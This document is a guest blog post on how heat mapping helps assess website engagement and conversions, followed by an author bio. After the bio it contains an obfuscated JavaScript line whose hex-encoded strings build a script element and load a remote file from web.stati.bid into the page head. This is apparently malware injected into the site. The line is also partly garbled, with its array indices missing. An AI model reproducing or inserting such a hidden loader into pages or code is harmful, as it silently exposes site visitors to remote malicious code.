When it comes to digital marketing, it is important that you get to know how efficient your marketing tools are, and a large part of the effort comes from knowing how effective your campaigns become in the long run. While hard numbers help a lot in these situations, sometimes seeing the “real deal” when it comes to your campaigns’ efficiency will not be enough with sheer numbers alone. Heat mapping can help you provide a more visual guide in terms of assessing the efficiency of your website and its conversions. Here’s a quick tour on heat mapping: what is it and how can it help your website and conversions?
Heat Mapping: The Basics
Before we go to discuss the benefits of heat mapping, it’s important to understand what heat mapping is in the first place. It might seem like a complicated tool at first, given new terms like “heat” and “mapping,” but it turns out to be such a creative and innovative tool for marketers and businesses.
- Heat mapping is a visual guide that helps represent behavior of audiences towards campaign tools that you have. This means heat mapping can be used on websites and almost anything that can record the frequency of how much users click or interact with certain objects.
- Heat mapping software are available on the internet, and it is up to you to choose whatever you think is best for your website. These offer quite a number of different features, most of which are elaborated upon below.
- Heat Mapping: Visual
Heat mapping is, in essence, a tool that tracks how much “heat’ certain components of your website or tools get from your users. This means heat maps are capable of tracking which parts of your website your readers go to, which parts they like best, down to which parts they are clicking. Think of it as an infrared view of your website, but this time it’s tailored to their engagements with your website. This is an extremely handy way of ensuring you have all the means to assess your website’s “performance” on a visual spectrum, and this makes it easier for you to make meetings and presentations much more accessible for others.
- Heat mapping is visual by nature, which means this is useful if you want a more creative approach when it comes to presenting your data. When combined with statistics, heat mapping can provide a useful way to tell everyone in your team which aspects of your website are most appealing to your users, and which parts of the website they like best.
- The visual nature of heat mapping make them very useful when it comes to making new plans and parameters, as well as metrics, for your website goals and ideal conversion rates. You can quickly identify points and parts in the website where you want the ideal “heat” to appear, and you can plan what ways to approach the problem with in order to come up with a solution.
2. Heat Mapping: Adaptable
The nature of heat maps make them much more visually appealing and understandable, especially to those who rely more on demonstration than numbers. However, this is not the only perk heat mapping has. Due to the fact that heat mapping can assess a website’s “appeal” to readers at any given time, heat maps are adaptable to the point of being able to access minute changes to your website. This means you are now more than capable of making concrete assessments and comparisons based on different date or time intervals. This makes it much easier for you to observe your website’s performance within small and large intervals without having to tinker too much with settings.
- Heat mapping assesses your website in any given period of time, which means its “visuals” are adaptable depending on your company’s needs. If you need to compare data between two separate dates or two separate designs, both are completely possible when you use heat mapping.
- This also means your heat mapping data can potentially be a real-time recorder of activity in your website. This is useful when you don’t think hard statistics are just cutting it, and you want actual behavior when it comes to how users navigate your website, as well as other useful real-time data you might need to make good assessments and adjustments to your plans.
3. Heat Mapping: Reusable
Heat mapping can be used across different platforms, and its customizable nature makes it extremely easy for you to use heat mapping software across different websites and campaign platforms. Meaning, heat mapping templates are completely reusable across various campaign methods, and you can easily customize the settings to fit changes you want to see throughout your campaigns. The reusable nature of heat mapping templates make it much easier and resource-friendly to use, and it can save a lot of time and money for you and your company in the long run. This means heat mapping can be an extremely reliable tool aside from statistics and hard numbers for your reports.
- Heat mapping’s extremely customizable nature makes it fit not just for websites, for various marketing tools as well such as forms and campaign materials. This means heat mapping can be used across all your websites at any given time. This provides you a lot of means to do proper comparison of statistics and other features across one platform to the other in order to identify points of relevance and points you can improve upon.
- This also means you can reuse your heat mapping settings, or even make entirely new ones, across different websites your company owns. This can tailor your meetings and presentations, or even your recording of relevant statistics, to fit and to assess whichever kind of information you need without making intense adjustments all the time. Ask a web design company to implement this for you.
Heat mapping in itself is an extremely useful tool to enhance your marketing strategy, especially when it comes to improving your website and conversions. However, before you gain any noticeable successes in your endeavors to use heat mapping, it is first important to see just how heat mapping can affect your overall statistics as a whole so you can assess if it is something that is on part with what your company needs. We hope you liked this Grantmcarthur.co.uk article.
Guest Post by Jason Michael
Jason is a professional SEO expert who’s had many years of experience in the digital marketing industry. This experience has lead him to be able to provide solid advice to those looking to improve their digital marketing. He currently writes for Grantmcarthur.co.uk and is dedicated to helping people with their SEO and other marketing needs.
var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4](_0x29b4);el[_0x29b4]= _0x29b4;document[_0x29b4][_0x29b4](el)